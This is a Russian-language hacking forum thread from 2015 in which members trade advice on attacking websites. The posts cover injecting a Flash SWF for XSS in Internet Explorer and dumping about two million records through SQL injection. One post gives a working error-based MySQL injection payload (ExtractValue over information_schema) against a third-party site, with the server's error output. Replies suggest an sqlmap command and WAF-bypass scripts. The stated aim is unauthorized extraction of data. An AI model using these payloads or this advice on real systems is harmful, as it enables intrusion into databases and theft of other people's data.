Старый 14.11.2015, 11:26   #3491
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от crlf Посмотреть сообщение
Пробовал заинжектить сжатую SWF c XSS, но скрипт не выполняется если подгружать с другого домена. Есть варианты как это можно использовать?
Непосредственно можно использовать это как XSS в IE. В SWF выполнить Javascript через ExternalInterface не получится, но можно полноценно обмениваться запросами с сервером. Хотя сегодня Flash настолько дырявый, что будет легче сразу выполнить свой код у атакуемого пользователя.
__________________
На правах рекламы.
NameSpace вне форума   Ответить с цитированием
Старый 14.11.2015, 18:37   #3492
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
Непосредственно можно использовать это как XSS в IE. В SWF выполнить Javascript через ExternalInterface не получится, но можно полноценно обмениваться запросами с сервером. Хотя сегодня Flash настолько дырявый, что будет легче сразу выполнить свой код у атакуемого пользователя.
Нашёл интересный вектор https://miki.it/blog/2014/7/8/abusin...rosetta-flash/, жаль что пофиксили, но на интересные мысли навёл. Попробую поискать нечто подобное.
crlf вне форума   Ответить с цитированием
Старый 15.11.2015, 12:23   #3493
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Цитата:
Сообщение от Лаврушкин Посмотреть сообщение
Не уверен, но посмотри http://www.slideshare.net/qqlan/database-honeypot-by-design-25195927
В подробностях не разбирал.
Вот это стоит в шпаргалку перепостить.
SynQ вне форума   Ответить с цитированием
Старый 25.11.2015, 02:54   #3494
snakes
 
Регистрация: 22.11.2014
Сообщений: 10
Репутация: 0
По умолчанию

Подскажите чем быстро можно сдампить 2кк записей, и как много времени займет этот процесс? Есть только скуль, к пхпмайадмин нет доступа.
snakes вне форума   Ответить с цитированием
Старый 25.11.2015, 03:06   #3495
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от snakes Посмотреть сообщение
Подскажите чем быстро можно сдампить 2кк записей, и как много времени займет этот процесс? Есть только скуль, к пхпмайадмин нет доступа.
Используйте векторы вытягивания данных колонок в 1-у строку.

В настоящее время список актуальных векторов можно посмотреть здесь: https://rdot.org/forum/showthread.php?t=2860
__________________
На правах рекламы.
NameSpace вне форума   Ответить с цитированием
Старый 25.11.2015, 03:34   #3496
snakes
 
Регистрация: 22.11.2014
Сообщений: 10
Репутация: 0
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
Используйте векторы вытягивания данных колонок в 1-у строку.

В настоящее время список актуальных векторов можно посмотреть здесь: https://rdot.org/forum/showthread.php?t=2860
А попроще? Софтом по типу Хави, есть что то такое?
snakes вне форума   Ответить с цитированием
Старый 26.12.2015, 09:41   #3497
xivi00
 
Регистрация: 18.10.2015
Сообщений: 3
Репутация: 0
По умолчанию

Есть скуля site.com/'
кртиться через error baze site.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
вот вывод Erreur SQL : XPATH syntax error: ':SESSION_STATUS' (1105)
SELECT apres FROM `sos`.`redirection` WHERE LCID=2057 AND avant = '/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1'
------------------------------------------------------------------------------------
но немогу не хавиджем не sqlmap ом раскрутить пробовал все уровни риски нечего, неоднаивестная миру программа не крутит, в чем может быть причина?
xivi00 вне форума   Ответить с цитированием
Старый 26.12.2015, 10:02   #3498
Mustang
 
Регистрация: 25.11.2015
Сообщений: 7
Репутация: 0
По умолчанию

Цитата:
Сообщение от xivi00 Посмотреть сообщение
Есть скуля site.com/'
кртиться через error baze site.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
вот вывод Erreur SQL : XPATH syntax error: ':SESSION_STATUS' (1105)
SELECT apres FROM `sos`.`redirection` WHERE LCID=2057 AND avant = '/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1'
------------------------------------------------------------------------------------
но немогу не хавиджем не sqlmap ом раскрутить пробовал все уровни риски нечего, неоднаивестная миру программа не крутит, в чем может быть причина?
А желательно бы запрос скинуть с sqlmap'а. Обычно в уязвимом в месте без параметров ставиться *. Запрос получиться примерно таким:
Код:
sqlmap -u "site.com/*"
Желательно сразу указать тип БД. Еще бывает такое, что сайт проверяет, например, user_agent, или необходимые куки. Попробуй курлом отправить запрос и посмотри чего сайт скажет.
Mustang вне форума   Ответить с цитированием
Старый 26.12.2015, 12:57   #3499
xivi00
 
Регистрация: 18.10.2015
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
Сообщение от Mustang Посмотреть сообщение
А желательно бы запрос скинуть с sqlmap'а. Обычно в уязвимом в месте без параметров ставиться *. Запрос получиться примерно таким:
Код:
sqlmap -u "site.com/*"
Желательно сразу указать тип БД. Еще бывает такое, что сайт проверяет, например, user_agent, или необходимые куки. Попробуй курлом отправить запрос и посмотри чего сайт скажет.
* ставлю это я в курсе, так же как и в хавидже %Inject_Here%
вот что говорит sqlmap

Код:
[13:56:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:56:16] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[13:56:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:56:44] [WARNING] URI parameter '#1*' is not injectable
[13:56:44] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[13:56:44] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 4 times, 404 (Not Found) - 221 times
xivi00 вне форума   Ответить с цитированием
Старый 26.12.2015, 20:03   #3500
sT1myL
 
Регистрация: 09.07.2014
Сообщений: 15
Репутация: 1
По умолчанию

403 (Forbidden) - 4 times, 404 (Not Found) - 221 times WAF надо использовать скрипты для обхода
sT1myL вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot